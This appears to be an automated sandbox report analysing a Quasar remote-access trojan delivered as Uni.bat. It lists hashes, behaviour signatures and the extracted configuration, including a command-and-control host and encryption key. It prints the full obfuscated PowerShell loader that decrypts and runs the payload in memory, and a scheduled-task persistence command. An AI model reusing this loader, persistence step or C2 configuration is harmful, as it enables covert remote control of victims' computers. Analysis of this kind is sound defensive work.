Analysis
-
max time kernel
133s -
max time network
136s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
24-06-2024 23:07
General
-
Target
Uni.bat
-
Size
253KB
-
MD5
6116316574a1311a2e768ef21255430d
-
SHA1
684dec7251dbacf3e3b5a3cac0492df268f7f9a3
-
SHA256
f975a314f9f0ac6527acf5098bd0c9ce8800c05b83ce3c5af01c1cb8e3bbbd5b
-
SHA512
daf318e0dde57bf13b2b30bdff1556749caf3ebda2cffd5ead57c2c998aae763214226121f02996d48bcea54d53b9c2c352c21a8638b0d42f36c8f41896be2f2
-
SSDEEP
3072:PfaskbNKw91ey00VTUsMHdJmMQ5C6QCf8qb/qV3/PJHnigpqoineD/QrM47f9Jms:nef9NVbkd5UzZfYh6n7P7KK2X78EM
Malware Config
Extracted
quasar
3.0.1
Office04
wireless-boston.gl.at.ply.gg:41366
QSR_MUTEX_W1ckGYHOGswdBegmKd
-
encryption_key
QbY1WN4Surh1trMXzt97
-
install_name
system.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
system
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Executes dropped EXE 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $LUjXk = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pfSAb in $LUjXk) { if ($pfSAb.StartsWith(':: ')) { $ysrPJ = $pfSAb.Substring(3); break; }; };$ydMoK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ysrPJ);$QmOjg = New-Object System.Security.Cryptography.AesManaged;$QmOjg.Mode = [System.Security.Cryptography.CipherMode]::CBC;$QmOjg.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$QmOjg.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8JDdwdCN8f9GIQeixAyEv80OWR2XU9cSTyINtWtC9E=');$QmOjg.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZMxKZ063xFXq46C7vuYyiQ==');$FoDTE = $QmOjg.CreateDecryptor();$ydMoK = $FoDTE.TransformFinalBlock($ydMoK, 0, $ydMoK.Length);$FoDTE.Dispose();$QmOjg.Dispose();$bzYHg = New-Object System.IO.MemoryStream(, $ydMoK);$EACsF = New-Object System.IO.MemoryStream;$cWBZp = New-Object System.IO.Compression.GZipStream($bzYHg, [IO.Compression.CompressionMode]::Decompress);$cWBZp.CopyTo($EACsF);$cWBZp.Dispose();$bzYHg.Dispose();$EACsF.Dispose();$ydMoK = $EACsF.ToArray();$fFqIs = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ydMoK);$sWumU = $fFqIs.EntryPoint;$sWumU.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "system" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\SubDir\system.exe"C:\Windows\SysWOW64\SubDir\system.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Uni.bat.exeFilesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sh1eofh1.l0q.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/2952-34-0x000001D8C15C0000-0x000001D8C161E000-memory.dmpFilesize
376KB
-
memory/2952-35-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-16-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-15-0x000001D8C1540000-0x000001D8C15B6000-memory.dmpFilesize
472KB
-
memory/2952-9-0x000001D8A9340000-0x000001D8A9362000-memory.dmpFilesize
136KB
-
memory/2952-32-0x000001D8C14C0000-0x000001D8C14F4000-memory.dmpFilesize
208KB
-
memory/2952-7-0x00007FFA76483000-0x00007FFA76484000-memory.dmpFilesize
4KB
-
memory/2952-14-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/2952-36-0x000001D8C1640000-0x000001D8C1652000-memory.dmpFilesize
72KB
-
memory/2952-37-0x000001D8C2E20000-0x000001D8C2E5E000-memory.dmpFilesize
248KB
-
memory/2952-94-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-50-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-77-0x0000019DD5140000-0x0000019DD517C000-memory.dmpFilesize
240KB
-
memory/4772-49-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-96-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB
-
memory/4772-97-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmpFilesize
9.9MB